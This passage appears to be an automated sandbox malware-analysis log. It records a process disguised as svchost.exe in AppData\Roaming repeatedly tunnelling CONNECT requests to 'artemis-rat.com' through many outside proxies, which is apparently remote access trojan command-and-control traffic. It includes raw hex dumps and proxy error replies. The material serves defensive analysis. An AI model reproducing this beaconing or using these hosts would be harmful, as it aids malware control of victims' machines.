                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 22 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 50 20 43 6f 6d 70 75 74 69 6e 67 20 43 6f 6e 63 65 70 74 73 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6c 69 62 2f 64 70 63 63 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 55 62 75 6e 74 75 3a 34 30 30 2c 33 30 30 2c 37 30 30 2c 35 30 30 2c 34 30 30 69 74 61 6c 69 63 25 37 63 44 69 64 61 63 74 2b 47 6f 74 68 69 63 3a 73 75 62 73 65 74 3d 6c 61 74 69 6e 2d 65 78 74 25 37 63 4d 75 6c 69 3a 34 30 30 2c 34 30 30 69 74 61 6c 69 63 2c 33 30 30 69 74 61 6c 69 63 2c 33 30 30 25 37 63 41 6d 69 6b 6f 3a 34 30 30 2c 37 30 30 22 0d 0a 20 20 20 20 20 20 20 20 20 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 31 2e 33 2f 64 69 73 74 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 31 42 6d 45 34 6b 57 42 71 37 38 69 59 68 46 6c 64 76 4b 75 68 66 54 41 55 36 61 75 55 38 74 54 39 34 57 72 48 66 74 6a 44 62 72 43 45 58 53 55 31 6f 42 6f 71 79 6c 32 51 76 5a 36 6a 49 57 33 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 31 2e 33 2f 64 69 73 74 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 6b 61 37 53 6b 30 47 6c 6e 34 67 6d 74 7a 32 4d 6c 51 6e 69 6b 54 31 77 58 67 59 73 4f 67 2b 4f 4d 68 75 50 2b 49 6c 52 48 39 73 45 4e 42 4f 30 4c 52 6e 35 71 2b 38 6e 62 54 6f 76 34 2b 31 70 22 0d
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="MobileOptimized" content="width"/> <meta name="HandheldFriendly" content="true"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon"/> <title>DP Computing Concepts</title> <link rel="stylesheet" href="/lib/dpcc.css"> <link href="https://fonts.googleapis.com/css?family=Ubuntu:400,300,700,500,400italic%7cDidact+Gothic:subset=latin-ext%7cMuli:400,400italic,300italic,300%7cAmiko:400,700" media="all" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous"></head><body> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p"
                                                                                    Mar 9, 2024 13:14:29.275366068 CET1286INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67
                                                                                    Data Ascii: crossorigin="anonymous"></script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script><header> <div class="row mt-2"> <div class="col-sm-auto"> <a href="http:
                                                                                    Mar 9, 2024 13:14:29.276684046 CET844INData Raw: 69 6e 67 20 62 61 73 69 63 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 61 6c 20 63 6f 6e 64 69 74 69 6f 6e 73 20 66 6f 72 20 67 72 6f 77 69 6e 67 20 0d 0a 20 61 67 72 69 63 75 6c 74 75 72 61 6c 20 70 72 6f 64 75 63 74 73 20 73 75 63 68 20 61 73 20 67 72
                                                                                    Data Ascii: ing basic environmental conditions for growing agricultural products such as grapes. These sensors are capable of remotely monitoring temperature, humidity, light levels, and soil moisture levels. The sensor readings are transmitted wire


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2164192.168.2.556870142.93.196.242312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.042049885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.676857948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.380702972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.880522013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.548304081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.254093885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2165192.168.2.556952172.67.182.228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.042845011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.200134993 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2166192.168.2.556754123.126.158.508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.043940067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2167192.168.2.55674894.45.74.60808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.044037104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2168192.168.2.55679346.101.186.2388043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.044559002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.628246069 CET806INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Server: Apache/2.4.29 (Ubuntu)
                                                                                    Content-Length: 614
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2169192.168.2.55676043.131.248.1651567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.044743061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2170192.168.2.55564943.255.113.232808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.045103073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.397716999 CET208INHTTP/1.0 404 Not Found
                                                                                    Server: HCS
                                                                                    Date: Sat, 09 Mar 2024 15:01:55 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 432
                                                                                    HCS-Error: ERR_FTP_NOT_FOUND 0
                                                                                    X-NGAA: MISS from CH-XW-NO1-315.1
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2171192.168.2.556819147.75.34.851000743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.045712948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.347167969 CET356INHTTP/1.0 502 Bad Gateway
                                                                                    Server: Zscaler/6.3
                                                                                    Content-Type: text/html
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2172192.168.2.556976104.16.105.1988043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.045778036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.202455997 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2173192.168.2.55678143.155.130.1821567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.045810938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2174192.168.2.55690592.204.135.371659143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.048680067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.645963907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.334120989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.833668947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.537020922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.333617926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2175192.168.2.556999203.32.120.2028043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.052761078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.209197044 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2176192.168.2.556758115.74.157.191108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.052840948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2177192.168.2.55670261.133.66.69900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.052953959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.427491903 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


